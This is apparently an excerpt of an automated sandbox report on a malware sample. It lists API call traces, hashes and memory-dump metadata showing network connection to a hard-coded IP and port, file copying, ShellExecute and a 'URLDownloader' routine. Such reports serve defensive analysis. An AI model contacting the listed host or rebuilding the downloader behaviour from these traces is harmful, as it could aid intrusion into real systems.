                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                                                            • String ID: 118.107.44.219$18852
                                                                                                                            • API String ID: 2357443324-3001398927
                                                                                                                            • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                                            • Instruction ID: 8ea8c21000931f3664100cedd98eebcd754df86da53339749fb4ddc4d9d3f251
                                                                                                                            • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                                            • Instruction Fuzzy Hash: 576128B5904629EFE704DFA4CC88F9DB7B5FB08306F148219E519AB2A0C775DA80CF65
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 0263548A
                                                                                                                            • getaddrinfo.WS2_32(1001C0E0,100185B0,?,00000000), ref: 026354D1
                                                                                                                            • WSACleanup.WS2_32 ref: 026354E0
                                                                                                                            • socket.WS2_32(?,?,?), ref: 02635529
                                                                                                                            • WSACleanup.WS2_32 ref: 0263553D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2560534018-0
                                                                                                                            • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                                            • Instruction ID: 15e04af564f46df95c48600176dcebb828335c63c979c30c9fe9839e56da6af9
                                                                                                                            • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                                            • Instruction Fuzzy Hash: 346118B1904229EFEB05CFA8C988FAD77B5FB0C315F108619E51AA72A0D734DA41CF65
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 02621659
                                                                                                                              • Part of subcall function 02621407: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 02621462
                                                                                                                              • Part of subcall function 02621407: CoTaskMemFree.COMBASE(00000000), ref: 026214B5
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 0262176F
                                                                                                                            • RegisterClassW.USER32(?), ref: 026217CE
                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 026217D6
                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 026217E9
                                                                                                                            • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 02621835
                                                                                                                            • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?), ref: 02621844
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0262186B
                                                                                                                            • TranslateMessage.USER32(?), ref: 02621879
                                                                                                                            • DispatchMessageW.USER32(?), ref: 02621883
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$CreateMetricsSystemWindow$ClassDispatchFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslate
                                                                                                                            • String ID: URLDownloader
                                                                                                                            • API String ID: 3953380684-1891997712
                                                                                                                            • Opcode ID: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                                                            • Instruction ID: 00d9b1859f1c075277666cc891b7ef4559c7c31b02a7582652f8be7fb878c3ea
                                                                                                                            • Opcode Fuzzy Hash: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                                                            • Instruction Fuzzy Hash: 30712BB1D00618EFEB54DFA8CC95BDDBBB5EF48300F108169E609AB280E7749A44CF55
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,10001A66,00000000,00000000,9A569D70,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016F29
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016F65
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,?,00000000,00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FA4
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10016FAF
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FC0
                                                                                                                            • _com_issue_error.COMSUPP ref: 10016FD8
                                                                                                                            • _com_issue_error.COMSUPP ref: 10016FE2
                                                                                                                            • GetLastError.KERNEL32(80070057,9A569D70,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016FE7
                                                                                                                            • _com_issue_error.COMSUPP ref: 10016FFA
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017008
                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017010
                                                                                                                            • _com_issue_error.COMSUPP ref: 10017023
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWidefree$AllocStringmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2710271231-0
                                                                                                                            • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                                            • Instruction ID: 6285890bd5176054e2d15964e4e0697efcddc290ec620ce681aa416c4b1e3c3a
                                                                                                                            • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                                            • Instruction Fuzzy Hash: EA41C3B5A00219ABD700CFA8DC45B9EBBE9FB4C650F114229F509EB281D735E981CBA0
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,02621A3B,02621A3D,00000000,00000000,1001C040,?,?,?,02621BBB,02621A3B,00000000,?,02621A3B,026227A3), ref: 02636F00
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,02621A3B,?,00000000,00000000,?,02621BBB,02621A3B,00000000,?,02621A3B), ref: 02636F7B
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 02636F86
                                                                                                                            • _com_issue_error.COMSUPP ref: 02636FAF
                                                                                                                            • _com_issue_error.COMSUPP ref: 02636FB9
                                                                                                                            • GetLastError.KERNEL32(80070057,1001C040,?,?,?,02621BBB,02621A3B,00000000,?,02621A3B,026227A3), ref: 02636FBE
                                                                                                                            • _com_issue_error.COMSUPP ref: 02636FD1
                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,02621BBB,02621A3B,00000000,?,02621A3B,026227A3), ref: 02636FE7
                                                                                                                            • _com_issue_error.COMSUPP ref: 02636FFA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1353541977-0
                                                                                                                            • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                                            • Instruction ID: 57e6c18f2d0464313a708cb3443653368f3ef238eba665d11c55c8612118f9c4
                                                                                                                            • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                                            • Instruction Fuzzy Hash: 4C41C3B1A04219ABDB129F68CC44BAEBBEEEF48714F14822DE505E7340D734D6148BA9
                                                                                                                            APIs
                                                                                                                            • __RTC_Initialize.LIBCMT ref: 1001650A
                                                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 10016524
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2442719207-0
                                                                                                                            • Opcode ID: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                                                            • Instruction ID: a50b9bcbe80e21d08239303d3e1b85a5ff725acd6039f41ad542be21913079e7
                                                                                                                            • Opcode Fuzzy Hash: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                                                            • Instruction Fuzzy Hash: A7419372E01629AFDB21CF94DD41B9E7AB9EB4C690F118129F8146F151C731DE818BE0
                                                                                                                            APIs
                                                                                                                            • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012187
                                                                                                                            • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012194
                                                                                                                            • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001219F
                                                                                                                            • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 100121BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1504536088-3916222277
                                                                                                                            • Opcode ID: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                                                            • Instruction ID: a0487576b8a3c5ffe6c335ea50ad64326e07086e404223857e371bd2d0d575a7
                                                                                                                            • Opcode Fuzzy Hash: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                                                            • Instruction Fuzzy Hash: 9C5161F5D00119EFDB04CFD4D8819EEBBB5EF48244F148459E901AB241EB34EBA4CBA5
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02635727: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0263575A
                                                                                                                              • Part of subcall function 026356D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 026356F5
                                                                                                                            • _Smanip.LIBCPMTD ref: 02635AE1
                                                                                                                            • _Smanip.LIBCPMTD ref: 02635B7B
                                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 02635CB8
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02635CD4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02635CE1
                                                                                                                            • CopyFileA.KERNEL32(00000000,?,00000000), ref: 02635D4A
                                                                                                                            • ShellExecuteA.SHELL32(00000000,100185D4,?,00000000,00000000,00000001), ref: 02635D70
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWait
                                                                                                                            APIs
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CF2
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CFF
                                                                                                                            • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011D0A
                                                                                                                            • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10011D17
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                                                            APIs
                                                                                                                            • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 10011B98
                                                                                                                            • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011BB8
                                                                                                                            • _Min_value.LIBCPMTD ref: 10011BCF
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10011BE3
                                                                                                                            • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011C0F
                                                                                                                            • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 10011C4D
                                                                                                                            • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 10011C9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                            APIs
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001200D
                                                                                                                            • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001201E
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012029
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10012053
                                                                                                                            • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10012083
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004EF7
                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 10004F34
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004F51
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10004F69
                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 10004F97
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 10004FB5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$memset
                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 02635DE1
                                                                                                                            • GetLastError.KERNEL32 ref: 02635DEA
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02635DFB
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02635E13
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 02635E1A
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 02635E2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                                                            APIs
                                                                                                                            • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 10011A61
                                                                                                                            • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011A7B
                                                                                                                            • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 10011ACC
                                                                                                                            • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011AFD
                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 10011B2C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: dllmain_raw$Main@12
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964726511-0
                                                                                                                            • Opcode ID: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                                                            • Instruction ID: 8d6bd2da0b109d18a1f6a57abd8894a449e88089a21e0de1c12475fa1702624c
                                                                                                                            • Opcode Fuzzy Hash: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                                                            • Instruction Fuzzy Hash: 2A218172E00219BBDB239F15CC40AAF7A6DEB81BA8B158129F91967214D3718D41DFEC
                                                                                                                            APIs
                                                                                                                            • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FEE
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FFB
                                                                                                                            • _CxxThrowException.VCRUNTIME140(?,10019CBC), ref: 100166FE
                                                                                                                            • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 1001670D
                                                                                                                            • _CxxThrowException.VCRUNTIME140(?,10019D9C), ref: 1001671B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1722040371-0
                                                                                                                            • Opcode ID: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                                                            • Instruction ID: 08eecf3aab68b4969477acf4f8a3a2caa643f1c7ff8f01e52dc4bc7ddf13aa92
                                                                                                                            • Opcode Fuzzy Hash: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                                                            • Instruction Fuzzy Hash: 56F0543880420DB78F04E6B9EC169ED777CEB04290F604125FA689D4D5EB71F6DA85D4
                                                                                                                            APIs
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(1001C31C,URLDownloader,?,100015D9,1001C6D4), ref: 10015F3B
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015D9,1001C6D4), ref: 10015F6E
                                                                                                                            • WakeAllConditionVariable.KERNEL32(1001C318,?,100015D9,1001C6D4), ref: 10015F79
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                                            • String ID: URLDownloader
                                                                                                                            • API String ID: 1466638765-1891997712
                                                                                                                            • Opcode ID: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                                                            • Instruction ID: 2635d989befe49f68561a0190eacd187a5f89713392b86b322bdf01f88d219c5
                                                                                                                            • Opcode Fuzzy Hash: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
